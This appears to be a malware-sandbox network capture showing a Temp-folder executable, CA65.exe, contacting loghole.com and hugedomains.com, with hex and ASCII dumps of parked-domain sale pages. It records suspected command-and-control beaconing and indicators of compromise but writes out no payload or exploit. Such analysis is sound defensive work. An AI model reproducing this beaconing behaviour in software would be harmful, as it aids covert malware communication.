2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 2c 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e Data Ascii: ,700&display=swap"><link rel="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 6e 67 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 61 6c 74 3d 22 48 65 61 64 65 72 20 4d 6f 62 69 6c 65 20 53 65 61 72 63 68 22 20 62 6f 72 64 65 72 3d 22 30 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 65 61 64 65 72 4d 6f 62 69 6c 65 53 65 61 72 63 68 4d 61 67 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 Data Ascii: ng" tabindex="0" alt="Header Mobile Search" border="0" onclick="headerMobileSearchMagFunc(); return false;"></div><div class="search-box " id="hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method="get" class="s
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 68 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 70 68 6f 6e 65 2d 69 63 6f 6e 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 6c 6c 2d 74 65 78 74 22 3e 2b 31 2d 33 30 33 2d 38 39 33 2d 30 35 35 32 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b Data Ascii: h"><img src="https://static.HugeDomains.com/images/hdv3-img/phone-icon.png" alt><span class="tell-text">+1-303-893-0552</span></a></div></div></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click();
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 69 63 6f 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 70 78 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 68 6f 70 70 69 6e 67 43 61 72 74 4c 69 6e 6b 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 Data Ascii: icon" style="padding-top:0px;"><a href="https://www.HugeDomains.com/shopping_cart.cfm" class="whiteLink " id="hdv3HeaderShoppingCartLinkID" aria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeDomains.com/i
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 Data Ascii: top:0px; margin-bottom:0px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1"></div><div class="circularJ_2"></div><div class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><div class="circu
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 4b 65 79 77 6f 72 64 52 61 6e 6b 65 72 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 64 69 66 2d 6c 22 3e 53 65 65 20 64 65 74 61 69 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 Data Ascii: .com/payment-plan-setup.cfm?d=KeywordRanker.com" class="link dif-l">See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="content"><sp
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6e 2d 62 6c 6f 63 6b 22 3e 0a 3c 68 31 20 69 64 3d 22 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 2d 6e 61 6d 65 22 3e 4b 65 79 77 6f 72 64 52 61 6e 6b 65 72 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 36 2c 30 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 Data Ascii: -block"><div class="bn-block"><h1 id="main" class="domain-name">KeywordRanker.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$6,095</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span class="g
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 6d 69 64 6c 65 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 22 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 69 67 68 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 4b 65 79 77 6f 72 64 52 61 6e 6b 65 72 2e 63 6f 6d 22 20 Data Ascii: ></div></div></button></div><div class="tablet-block-midle" style="padding-bottom:25px;"><span style="font-size:16px;">or</span></div><div class="tablet-block-right"><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=KeywordRanker.com"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
309	192.168.2.4	56550	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	322	OUT	GET /admin/ HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_KYSxjKrqL2lzE7+7fDdCUKuJsj/lIJ++oLSl09H3p+IjBnyauJpugVjvD2WzBBjUqYhkqsz/sGPUdUxirM761A Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:11 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
310	192.168.2.4	56559	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	199	OUT	GET /domain_profile.cfm?d=vixej.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	794	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:11 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:11 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=89MqoNauowsMpJ38f4liJYdC8kkgvZM5VUvG0G2xKyUqC%2Be5wWoLILToPxga3mDoxEsyWP22zw4hPfF1yMZbxn5Yj1JcfebbJUwjkGTDZH0i3MVpZEs%2FFeCvCcowoV3mpwnjN1s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b09101dd38da3-MIA
2023-12-22 20:15:11 UTC	575	IN	Data Raw: 37 63 38 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 Data Ascii: 7c88<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 Data Ascii: <link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/h
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 Data Ascii: l="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag('js'
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 65 72 20 4d 6f 62 69 6c 65 20 53 65 61 72 63 68 22 20 62 6f 72 64 65 72 3d 22 30 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 65 61 64 65 72 4d 6f 62 69 6c 65 53 65 61 72 63 68 4d 61 67 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 69 64 3d 22 73 69 74 65 48 65 61 64 65 72 Data Ascii: er Mobile Search" border="0" onclick="headerMobileSearchMagFunc(); return false;"></div><div class="search-box " id="hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method="get" class="search-form" id="siteHeader
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 70 68 6f 6e 65 2d 69 63 6f 6e 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 6c 6c 2d 74 65 78 74 22 3e 2b 31 2d 33 30 33 2d 38 39 33 2d 30 35 35 32 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b 20 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 Data Ascii: c.HugeDomains.com/images/hdv3-img/phone-icon.png" alt><span class="tell-text">+1-303-893-0552</span></a></div></div></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click(); "></div><div class="over
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 70 78 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 68 6f 70 70 69 6e 67 43 61 72 74 4c 69 6e 6b 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 63 61 72 74 2e 70 6e 67 22 20 61 Data Ascii: px;"><a href="https://www.HugeDomains.com/shopping_cart.cfm" class="whiteLink " id="hdv3HeaderShoppingCartLinkID" aria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeDomains.com/images/hdv3-img/cart.png" a
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 36 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 37 22 3e 3c 2f Data Ascii: >Processing<div class="circularJ"><div class="circularJ_1"></div><div class="circularJ_2"></div><div class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><div class="circularJ_6"></div><div class="circularJ_7"></
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 6e 6b 20 64 69 66 2d 6c 22 3e 53 65 65 20 64 65 74 61 69 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 33 30 2d 64 61 79 20 6d 6f 6e 65 79 20 62 61 63 6b 20 67 75 61 72 61 6e 74 65 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 Data Ascii: nk dif-l">See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="content"><span>30-day money back guarantee</span></div></li><li><d
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 56 69 78 65 6a 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 39 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 39 39 35 3c 2f 73 70 61 6e 3e 20 6f 72 20 70 61 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 30 38 2e 31 33 3c 2f 73 70 61 6e 3e 20 70 65 72 20 6d 6f 6e 74 68 20 66 6f Data Ascii: Vixej.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$4,995</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span class="green">$4,995</span> or pay <span class="green">$208.13</span> per month fo
